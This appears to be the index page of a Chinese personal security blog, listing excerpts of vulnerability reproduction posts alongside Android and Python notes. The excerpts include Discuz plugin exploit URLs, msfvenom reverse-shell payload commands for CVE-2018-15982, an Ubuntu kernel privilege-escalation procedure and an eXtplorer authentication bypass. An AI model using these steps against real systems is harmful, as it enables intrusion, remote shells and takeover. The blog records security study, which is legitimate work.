只因不值得 
  • 首页
  • 归档
  • 分类
  • 关于
  • 友链
  •     

Dz x3.4逻辑漏洞复现

影响版本x3.4,安装并开启了微信登录插件原贴:https://www.sk15.net/archives/119.html?tdsourcetag=s_pcqq_aiomsg EXP# 随机登陆一个账号,任意填写 /plugin.php?id=wechat:wechat&ac=wxregister&username={username} # 清空tmp /plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={csrf_hash} # 注册账号 /plugin.php?id=wechat:wechat&ac=wxregister&username={username}&wxopenid=abcdefg 登录之后会跳转到微信,然后回到首页刷新即可 ...
 2019-08-19   漏洞   

CVE-2018-15982漏洞复现

简介当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982Adobe和Flash Player installer中的高危 捆绑监听msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > 86.bin msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > 64.bin python CVE-2018-15982.py -i 86.bin -I 64.bin -o apt.swf 生成为文件复制到/var/www/html/下并开启apache服务...
 2019-08-19   漏洞   

ubantu本地提权漏洞【CVE-2017-16995】

漏洞简介Twitter上Nikolenko发推表示ubuntu最新版本存在一个本地提权漏洞,并且提供了EXP下载地址该漏洞在老版本中已经完成修复,但是在ubuntu16.04版本依旧可以被利用。 影响版本受影响版本: 4.14 - 4.4.0-103 内核版本 漏洞利用把exp上传到拥有漏洞的Linux服务器 然后我们开始编译该文件 gcc -o upstream44 upstream44.c 得到可执行文件upstream44 最后,执行刚刚编译后的文件 ./upstream44 成功提升到root权限...
 2019-08-19   漏洞   

St2-057漏洞复现

简介定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行...
 2019-08-19   漏洞   

explorer绕过密码验证复现

简介extplorer是一个文件管理的CMS 原文:https://mp.weixin.qq.com/ 漏洞复现利用:post表单提交的时候把密码参数去掉,并确定该账户存在 感觉一个个猜太麻烦了,菜鸡的我写了一个简易脚本(写码三分钟,debug一整天)...
 2019-08-19   漏洞   

Eclipse安装

下载EclipseEclipse官方下载地址: https://www.eclipse.org/downloads/eclipse-packages/根据自己的需求选择不同的版本...
 2019-08-19   Android   

ADT + Android SDK

ADT安装的两种方式在eclipse的插件安装界面中通过在线安装在线安装地址:http://dl-ssl.google.com/androd/eclipse/ 打开eclipse - help - install New Software...
 2019-08-19   Android   

突破WIFI黑白名单限制

扯淡之前写了一个破解WIFI的,本来那天就应该写的,结果那个网卡不支持修改MAC地址 还搞了几天,还是没成功,最后网卡被我分尸了,感觉实在是受不了这委屈(特地另开一章) 盘他...
 2019-08-19   随手记   

分析无字母数字一句话组合

简介今天在一个在线靶场上做题,发现了一个没有数字和字母组成的一句话!很好奇,也看不懂,就去求助了某世。。。转来转去一个钟后,emm,终于看懂了...
 2019-08-19   Web   

PrettyTable

0X00 安装pip install prettytable0X01 创建表(1).直接创建x = PrettyTable()...
 2019-08-19   Python   
1234…7

搜索

2018 只因不值得